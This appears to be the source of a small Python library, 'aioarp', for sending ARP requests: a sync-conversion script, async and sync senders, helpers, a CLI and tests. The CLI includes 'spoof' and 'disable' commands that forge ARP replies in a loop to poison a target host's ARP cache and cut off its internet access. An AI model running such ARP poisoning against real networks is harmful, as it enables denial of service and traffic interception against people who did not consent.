import re

FILES = [
     ("aioarp/_async.py", "aioarp/_sync.py"),
     ("tests/test_async.py", "tests/test_sync.py")
]

SUBS = [
    ('async def async_send_arp', 'def sync_send_arp'),
    ('async def', 'def'),
    ('from .backends._async import AsyncStream', 'from .backends._sync import Stream'),
    ('AsyncStream', 'Stream'),
    ('await ', ''),
    ('async_send_arp', 'sync_send_arp'),
    ('aioarp.arequest', 'aioarp.request'),
    ("async with", "with")
]

COMPILED_SUBS = [
    (re.compile(r'(^|\b)' + regex + r'($|\b)'), replaced)
    for regex, replaced in SUBS
]


def unasync_line(line):
    for regex, replaced in COMPILED_SUBS:
        line = re.sub(regex, replaced, line)
    return line


def unasync_file(async_path, sync_path):
    with open(async_path, "r") as in_file:
        with open(sync_path, "w", newline="") as sync_file:
            for line in in_file.readlines():
                line = unasync_line(line)
                sync_file.write(line)

def unasync_file_check(async_path, sync_path):
    with open(async_path, "r") as in_file:
        with open(sync_path, "r") as out_file:
            line = 0
            for in_line, out_line in zip(in_file.readlines(), out_file.readlines()):
                line += 1
                expected = unasync_line(in_line)
                if out_line != expected:
                    print(f'Mismatch in: {sync_path}:{line}')
                    print(f'Expected: {expected!r}')
                    print(f'Actual:   {out_line!r}')
                    sys.exit(1)

if __name__ == "__main__":
    import sys

    if 'check' not in sys.argv:
         for async_, sync_ in FILES:
              unasync_file(async_, sync_)
    else:
         for async_, sync_ in FILES:
              unasync_file_check(async_, sync_)


import socket
import time
import typing

from aioarp import _exceptions as exc
from aioarp._arp import ARP_HEADER_SIZE
from aioarp._arp import ETHERNET_HEADER_SIZE
from aioarp._arp import ArpPacket
from aioarp._arp import EthPacket
from aioarp._arp import ProtocolType
from aioarp._backends import AsyncStream
from aioarp._backends._base import SocketInterface
from aioarp._utils import get_default_interface
from aioarp._utils import is_valid_ipv4
from aioarp.defaults import DEFAULT_READ_TIMEOUT
from aioarp.defaults import DEFAULT_REPLY_MISSING_TIME
from aioarp.defaults import DEFAULT_WRITE_TIMEOUT

__all__ = (
    'async_send_arp',
)


async def receive_arp(sock: AsyncStream, target_ip: str, timeout: float) -> ArpPacket:
    start_time = time.time()
    while True:

        # Check if timeout was expired
        if time.time() - start_time > timeout:
            raise exc.NotFoundError()

        # Try to read frame
        try:
            frame = await sock.receive_frame(timeout=DEFAULT_READ_TIMEOUT)
        except Exception as e:  # pragma: no cover
            raise exc.NotFoundError() from e

        # Extract the ethernet header
        eth_header = frame[:ETHERNET_HEADER_SIZE]

        try:
            eth_packet = EthPacket.parse(eth_header)
            if eth_packet.proto != ProtocolType.arp:
                continue


            arp_response = ArpPacket.parse(
                frame[ETHERNET_HEADER_SIZE: ETHERNET_HEADER_SIZE + ARP_HEADER_SIZE])
            if arp_response.sender_ip != target_ip:
                continue
            if is_valid_ipv4(arp_response.sender_ip):
                return arp_response
        except BaseException:  # pragma: no cover
            # TODO: catch concrete errors
            ...


async def async_send_arp(arp_packet: ArpPacket,
                         sock: typing.Optional[SocketInterface] = None,
                         interface: typing.Optional[str] = None,
                         timeout: typing.Optional[float] = None,
                         wait_response: bool = True) -> typing.Optional[ArpPacket]:
    ethernet_packet = EthPacket(
        target_mac=arp_packet.target_mac,
        sender_mac=arp_packet.sender_mac,
        proto=ProtocolType.arp
    )
    if interface is None:  # pragma: no cover
        interface = get_default_interface()
    if not sock:  # pragma: no cover
        sock = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
    async with AsyncStream(interface=interface,
                    sock=sock) as stream:
        try:
            frame_to_send = ethernet_packet.build_frame() + arp_packet.build_frame()
            await stream.write_frame(frame_to_send, timeout=DEFAULT_WRITE_TIMEOUT)
        except exc.WriteTimeoutError as e:  # pragma: no cover
            raise exc.NotFoundError from e
        
        if wait_response:
            return await receive_arp(stream, arp_packet.target_ip, timeout or DEFAULT_REPLY_MISSING_TIME)
        return None  # pragma: no cover


import typing

import aioarp

from ._arp import ArpPacket
from ._arp import HardwareType
from ._arp import ProtocolType
from ._async import async_send_arp
from ._backends._base import SocketInterface
from ._sync import sync_send_arp
from ._utils import get_ip
from ._utils import get_mac
from ._utils import is_valid_ipv4

__all__ = (
    'build_arp_packet',
    'request',
    'arequest'
)


def build_arp_packet(
        target_ip: str,
        interface: typing.Optional[str] = None,
) -> ArpPacket:
    if interface is None:
        interface = aioarp.get_default_interface()
    if not is_valid_ipv4(target_ip):
        raise aioarp.InvalidIpError("Invalid IPv4 Address was received")

    hardware_type = HardwareType.ethernet
    protocol_type = ProtocolType.ip

    # TODO: catch interface not found error
    sender_mac = get_mac(interface)
    sender_ip = get_ip()
    target_mac = 'ff:ff:ff:ff:ff:ff'

    request_packet = ArpPacket(
        hardware_type,
        protocol_type,
        sender_mac,
        sender_ip,
        target_mac,
        target_ip,
    )
    return request_packet


def request(
        target_ip: str,
        interface: typing.Optional[str] = None,
        sock: typing.Optional[SocketInterface] = None,
        timeout: typing.Optional[float] = None,
        wait_response: bool = True
) -> typing.Optional[ArpPacket]:
    request_packet = build_arp_packet(target_ip, interface)
    arp_response = sync_send_arp(request_packet, sock, interface, timeout, wait_response)
    return arp_response


async def arequest(
        target_ip: str,
        interface: typing.Optional[str] = None,
        sock: typing.Optional[SocketInterface] = None,
        timeout: typing.Optional[float] = None,
        wait_response: bool = True
) -> typing.Optional[ArpPacket]:
    request_packet = build_arp_packet(target_ip, interface)
    arp_response = await async_send_arp(request_packet, sock, interface, timeout, wait_response)
    return arp_response



import datetime
import time

try:
    import typer
except ImportError as e:
    text = ("You are attempting to use aioarp cli without "
            "installing the necessary dependencies; install "
            "aioarp with all required cli dependencies using "
            "this command `pip install aioarp[cli]`")
    raise ImportError(text) from e

import typing

from typing_extensions import Annotated

import aioarp

app = typer.Typer()

# TODO: add tests

@app.command()
def send(
        target_ip: Annotated[str,
                             typer.Argument(
                                help="Target IP, the IP address for "
                                "which we are looking for a mac address.")],
        interface: Annotated[str,
                             typer.Argument(
                                help="Network interface which should be used to send the arp packet.")] = None,
        timeout: Annotated[typing.Optional[int], typer.Option(help="Timeout for arp request.")] = None,
        wait_response: Annotated[bool,
                                 typer.Option(help="If you do not want to wait for a response, set False.")] = True
) -> None:  # pragma: no cover
        try:
            request_packet = aioarp.build_arp_packet(target_ip, interface)
            interface = interface or aioarp.get_default_interface()

            if wait_response:
                print(f"Looking for {request_packet.target_ip} in "
                      f"{interface}[{request_packet.target_mac}]")
            else:
                print(f"ARP packet seeking {request_packet.target_ip}" 
                      f"was sent in {interface}[{request_packet.target_mac}]")
            arp_response = aioarp.sync_send_arp(request_packet, None, interface, timeout, wait_response)

            if wait_response:
                text = f"The mac address of IP '{target_ip}' is: {arp_response.sender_mac}"
                print(text)
            return typer.Exit()
        except PermissionError:
            text = "To send ARP requests, you must run a script with root privileges."
            print(text)
            return typer.Exit(1)
        except aioarp.NotFoundError:
            text = f"The IP address {target_ip}' did not respond to our ARP request."
            print(text)
            return typer.Exit(1)

@app.command()
def spoof(
    target_ip: Annotated[str,
        typer.Argument(help="Target IP address for which we want to disable internet access via ARP poisoning")],
    pretend_as: Annotated[str,
                          typer.Argument(
                            help="The IP address that we are pretending to be is used "
                          "to force the host to send traffic to you instead of this IP address.")],
    fake_mac: Annotated[str,
                          typer.Argument(
                            help="Fake mac address that should be set as pretend_as's mac address.")],
    interface: Annotated[str,
                          typer.Argument(
                            help="Network interface which should be used to send the arp packet.")] = None,
    seconds: Annotated[int,
                       typer.Option(help="Specifies the length of time we"
                                    " want to disable internet access for this host.")] = 5
):
    broadcast = target_ip == '0.0.0.0'

    if not broadcast:
        response = aioarp.request(target_ip, interface)
    arp_packet = aioarp.build_arp_packet(target_ip, interface)
    arp_packet.sender_ip = pretend_as
    arp_packet.sender_mac = fake_mac
    arp_packet.target_mac = 'ff:ff:ff:ff:ff:ff' if broadcast else response.sender_mac
    arp_packet.opcode = aioarp.Opcode.response

    start_time = time.time()
    
    print(f"ARP poisoning has begun. [{datetime.datetime.now()}]")
    while True:
        
        aioarp.sync_send_arp(arp_packet, interface=interface, wait_response=False, timeout=1)
        if time.time() - start_time > seconds:
            break
    print(f"The ARP poisoning has ended. [{datetime.datetime.now()}]")


@app.command()
def disable(
    target_ip: Annotated[str,
        typer.Argument(help="Target IP address for which we want to disable internet access via ARP poisoning")],
    pretend_as: Annotated[str,
                          typer.Argument(
                            help="The IP address that we are pretending to be is used "
                          "to force the host to send traffic to you instead of this IP address.")],
    interface: Annotated[str,
                          typer.Argument(
                            help="Network interface which should be used to send the arp packet.")] = None,
    seconds: Annotated[int,
                       typer.Option(help="Specifies the length of time we"
                                    " want to disable internet access for this host.")] = 5
):
    response = aioarp.request(target_ip, interface)
    arp_packet = aioarp.build_arp_packet(target_ip, interface)
    arp_packet.sender_ip = pretend_as
    arp_packet.sender_mac = "11:11:11:11:11:11"
    arp_packet.target_mac = response.sender_mac
    arp_packet.opcode = aioarp.Opcode.response

    start_time = time.time()
    
    print(f"ARP poisoning has begun. [{datetime.datetime.now()}]")
    while True:
        
        aioarp.sync_send_arp(arp_packet, interface=interface, wait_response=False, timeout=1)
        if time.time() - start_time > seconds:
            break
    print(f"The ARP poisoning has ended. [{datetime.datetime.now()}]")

if __name__ == "__main__":
    app()




import pytest

import aioarp
from aioarp import HardwareType
from aioarp import ProtocolType
from aioarp import build_arp_packet

def test_invalid_ip():
    with pytest.raises(aioarp.InvalidIpError):
        aioarp.build_arp_packet('10.10.10.10.10', 'test')


def test_build_packet():
    packet = build_arp_packet('192.168.0.85', 'test')

    assert packet.sender_mac == '11:11:11:11:11:11'
    assert packet.sender_ip == '127.0.0.1'
    assert packet.hardware_type == HardwareType.ethernet
    assert packet.protocol_type == ProtocolType.ip
    assert packet.target_mac == 'ff:ff:ff:ff:ff:ff'
    assert packet.target_ip == '192.168.0.85'

def test_build_packet_without_interface():
    packet = build_arp_packet('192.168.0.85')

    assert packet.sender_mac == '11:11:11:11:11:11'
